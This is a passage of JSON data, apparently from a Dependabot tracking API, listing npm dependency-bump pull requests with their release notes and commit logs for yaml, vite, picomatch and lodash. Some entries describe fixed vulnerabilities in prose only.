href=\"https://github.com/eemeli/yaml/commit/6eca2a7087548f86c4edb6a7cf2cdfe548759f06\"\u003e\u003ccode\u003e6eca2a7\u003c/code\u003e\u003c/a\u003e fix: Avoid calling Array.prototype.push.apply() with large source array\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/0543cd57fd61ea15a58e9f0ec2064b8b408177d8\"\u003e\u003ccode\u003e0543cd5\u003c/code\u003e\u003c/a\u003e fix(lexer): Avoid recursive calls that may exhaust the call stack\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/ccdf7439587544f64223429498a1d9ec514eaac1\"\u003e\u003ccode\u003eccdf743\u003c/code\u003e\u003c/a\u003e 2.8.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/f625789dbd971c936ff66fe5c49e368062ae7b41\"\u003e\u003ccode\u003ef625789\u003c/code\u003e\u003c/a\u003e fix: Disable alias resolution with maxAliasCount:0 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/677\"\u003e#677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/e1a1a7735ff2e9717b87af36795bcd280f85f55d\"\u003e\u003ccode\u003ee1a1a77\u003c/code\u003e\u003c/a\u003e fix: Handle invalid unicode escapes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/a163ea009c57ab9f1054ca39b24b6ef4c1e9fdbe\"\u003e\u003ccode\u003ea163ea0\u003c/code\u003e\u003c/a\u003e style: Satify Prettier\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/b2a5a6c615673056917aaa04d657802945e81425\"\u003e\u003ccode\u003eb2a5a6c\u003c/code\u003e\u003c/a\u003e fix: Apply minFractionDigits only to decimal strings (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/676\"\u003e#676\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/93c951b3478b4bb061d7b5227fd64f46d3f9df7f\"\u003e\u003ccode\u003e93c951b\u003c/code\u003e\u003c/a\u003e chore: Bump JSR version to v2.8.3 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/673\"\u003e#673\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eemeli/yaml/compare/v2.8.1...v2.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.1.7 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca hre...\n\n_Description has been truncated_","html_url":"https://github.com/HarleyCoops/accountability/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/HarleyCoops%2Faccountability/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"}},{"old_version":"5.2.1","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-27T02:58:31.000Z","version_change":"5.2.1 → 5.2.4","issue":{"uuid":"4529108448","node_id":"PR_kwDOOinlVM7fp_ES","number":32,"state":"closed","title":"Bump the npm_and_yarn group across 5 directories with 25 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-29T00:20:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-27T02:58:31.000Z","updated_at":"2026-05-29T00:20:56.000Z","time_to_close":163343,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":25,"packages":[{"name":"lodash","old_version":"4.17.21","new_version":"4.18.1","repository_url":"https://github.com/lodash/lodash"},{"name":"@opentelemetry/sdk-node","old_version":"0.41.2","new_version":"0.218.0","repository_url":"https://github.com/open-telemetry/opentelemetry-js"},{"name":"aws-sdk","old_version":"2.1358.0","new_version":"2.1693.0","repository_url":"https://github.com/aws/aws-sdk-js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"@node-oauth/oauth2-server","old_version":"5.1.0","new_version":"5.3.0","repository_url":"https://github.com/node-oauth/node-oauth2-server"},{"name":"@node-saml/passport-saml","old_version":"4.0.4","new_version":"5.1.0","repository_url":"https://github.com/node-saml/passport-saml"},{"name":"@xmldom/xmldom","old_version":"0.7.13","new_version":"0.8.13","repository_url":"https://github.com/xmldom/xmldom"},{"name":"i18next-fs-backend","old_version":"2.3.1","new_version":"2.6.4","repository_url":"https://github.com/i18next/i18next-fs-backend"},{"name":"i18next-http-middleware","old_version":"3.5.0","new_version":"3.9.3","repository_url":"https://github.com/i18next/i18next-http-middleware"},{"name":"mongoose","old_version":"8.9.5","new_version":"8.22.1","repository_url":"https://github.com/Automattic/mongoose"},{"name":"nodemailer","old_version":"6.9.9","new_version":"8.0.5","repository_url":"https://github.com/nodemailer/nodemailer"},{"name":"dompurify","old_version":"3.2.4","new_version":"3.4.0","repository_url":"https://github.com/cure53/DOMPurify"},{"name":"postcss","old_version":"8.5.3","new_version":"8.5.10","repository_url":"https://github.com/postcss/postcss"},{"name":"uuid","old_version":"9.0.1","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"tmp","old_version":"0.2.3","new_version":"0.2.6","repository_url":"https://github.com/raszi/node-tmp"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.25.9","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@tootallnate/once","old_version":"2.0.0","new_version":"2.0.1","repository_url":"https://github.com/TooTallNate/once"},{"name":"axios","old_version":"1.8.4","new_version":"1.16.1","repository_url":"https://github.com/axios/axios"},{"name":"fast-uri","old_version":"3.0.1","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"path-to-regexp","old_version":"0.1.12","new_version":"0.1.13","repository_url":"https://github.com/pillarjs/path-to-regexp"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 22 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [@opentelemetry/sdk-node](https://github.com/open-telemetry/opentelemetry-js) | `0.41.2` | `0.218.0` |\n| [aws-sdk](https://github.com/aws/aws-sdk-js) | `2.1358.0` | `2.1693.0` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [@node-oauth/oauth2-server](https://github.com/node-oauth/node-oauth2-server) | `5.1.0` | `5.3.0` |\n| [@node-saml/passport-saml](https://github.com/node-saml/passport-saml) | `4.0.4` | `5.1.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.7.13` | `0.8.13` |\n| [i18next-fs-backend](https://github.com/i18next/i18next-fs-backend) | `2.3.1` | `2.6.4` |\n| [i18next-http-middleware](https://github.com/i18next/i18next-http-middleware) | `3.5.0` | `3.9.3` |\n| [mongoose](https://github.com/Automattic/mongoose) | `8.9.5` | `8.22.1` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `6.9.9` | `8.0.5` |\n| [dompurify](https://github.com/cure53/DOMPurify) | `3.2.4` | `3.4.0` |\n| [postcss](https://github.com/postcss/postcss) | `8.5.3` | `8.5.10` |\n| [uuid](https://github.com/uuidjs/uuid) | `9.0.1` | `14.0.0` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.1` | `5.2.4` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.3` | `0.2.6` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.25.9` | `7.29.7` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `2.0.0` | `2.0.1` |\n| [axios](https://github.com/axios/axios) | `1.8.4` | `1.16.1` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.1` | `3.1.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `0.1.12` | `0.1.13` |\n\nBumps the npm_and_yarn group with 1 update in the /libraries/metrics directory: [@opentelemetry/sdk-node](https://github.com/open-telemetry/opentelemetry-js).\nBumps the npm_and_yarn group with 4 updates in the /server-ce/test directory: [uuid](https://github.com/uuidjs/uuid), [js-yaml](https://github.com/nodeca/js-yaml), [path-to-regexp](https://github.com/pillarjs/path-to-regexp) and [sha.js](https://github.com/crypto-browserify/sha.js).\nBumps the npm_and_yarn group with 5 updates in the /services/web directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [@node-saml/passport-saml](https://github.com/node-saml/passport-saml) | `4.0.4` | `5.1.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.7.13` | `0.9.10` |\n| [mongoose](https://github.com/Automattic/mongoose) | `8.9.5` | `8.22.1` |\n| [nodemailer](https://github.com/nodemailer/nodemailer) | `6.10.1` | `8.0.9` |\n| [uuid](https://github.com/uuidjs/uuid) | `9.0.1` | `14.0.0` |\n\nBumps the npm_and_yarn group with 3 updates in the /services/web/scripts/translations directory: [lodash](https://github.com/lodash/lodash), [ajv](https://github.com/ajv-validator/ajv) and [postcss](https://github.com/postcss/postcss).\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca 